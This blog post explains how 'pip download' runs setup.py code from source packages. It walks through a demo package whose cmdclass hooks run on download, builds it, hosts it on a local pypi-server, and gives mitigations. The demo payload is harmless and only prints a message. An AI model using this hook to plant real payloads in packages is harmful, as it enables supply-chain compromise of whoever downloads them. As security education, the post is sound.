Malicious Python Packages and Code Execution via pip download
This week I learned about a design flaw with pip download
, which allows an adversary to run arbitrary code.
I assumed that running pip install
means anything could happen, but pip download
seems a bit surprising.
Both seem useful for red teaming though.
Background
This post from Yehuda Gelb named Automatic Execution of Code Upon Package Download on Python Package Manager which the Security Now! podcast pointed me towards.
The post highlights that just running pip download
can compromise your computer.
It turns out that this behavior is known since at least 2014, based on a pip Github issue named Avoid generating metadata in pip download which raised this concern.
Let’s investigate this more closely.
Authoring a Python package
I had never built a python package before, but the process is well documented. There are different ways to go about it, and the vulnerability exists when using the older setup.py
variation and when the package is in a .tar.gz
.
There is a basic project I put together on Github:
git clone https://github.com/wunderwuzzi23/this_is_fine_wuzzi
The key piece, which took a few minutes to figure out (stackoverflow is your friend), was to figure out how to specify a command to run.
The way I went about it (not sure if there are others), is to include cmdclass
in the setup, which causes pip to execute the provided command function upon both download
and install
of the package.
...
cmdclass={
'install' : RunInstallCommand,
'egg_info': RunEggInfoCommand
},
...
My demo just runs a print
command:
...
def RunCommand():
print("Hello, p0wnd!")
class RunInstallCommand(install):
def run(self):
RunCommand()
install.run(self)
...
Now, we are good to go.
Building the package
The next step is to bundle it up in a package, which is done using:
python -m build
This will create a ./dist/
folder containing the wheel
and tar.gz
files.
For this demo exploit we are only interesting in the tar.gz.
file.
In case you encounter errors building, make sure to have setuptools
and build
packages installed.
Hosting the package using pypi-server
Now it’s time to host the package on a server.
To test this out, I decided to host the package on my own test pypi-server
.
pypi-server run -v -p 8080 ./packages
Then copy the tar.gz
file to your pypi-server’s ./packages
folder.
Above screenshot shows how this looks once running.
Download or Install the package
Using the --index-url
it’s possible to point pip
to an alternate package server, which is what we can leverage to test this out:
pip download this_is_fine_wuzzi --index-url http://amstrad:8080 --trusted-host amstrad -v
And our code will run now as part of this.
Notes:
- Messages printed to console won’t be shown unless you specify
-v
. - The
--trusted-host
option was added because this was quick demo test. If you have a TLS connection with a valid certificate this will not be needed.
There are now tons of ways this can be abused, e.g. just thinking of Jupyter notebooks or Google Colab, etc.
Mitigations
The setup.py
is only executed if the package is in tar.gz
format. So, either reviewing the tar file or making sure there is a wheel file (.whl
) present and used.
You can enumerate the offered packages via https://packagemanager/simple/<package-name>
.
This way one can see what files are hosted for the package (tar or wheel, or both), and download (e.g. wget
) and inspect the tar.gz
file if that is the only option.
Conclusions
Having a pip download
execute arbitrary code is quite unexpected and easy to repro and perform for an attacker.
Make sure to inspect packages before you download or install them using pip
.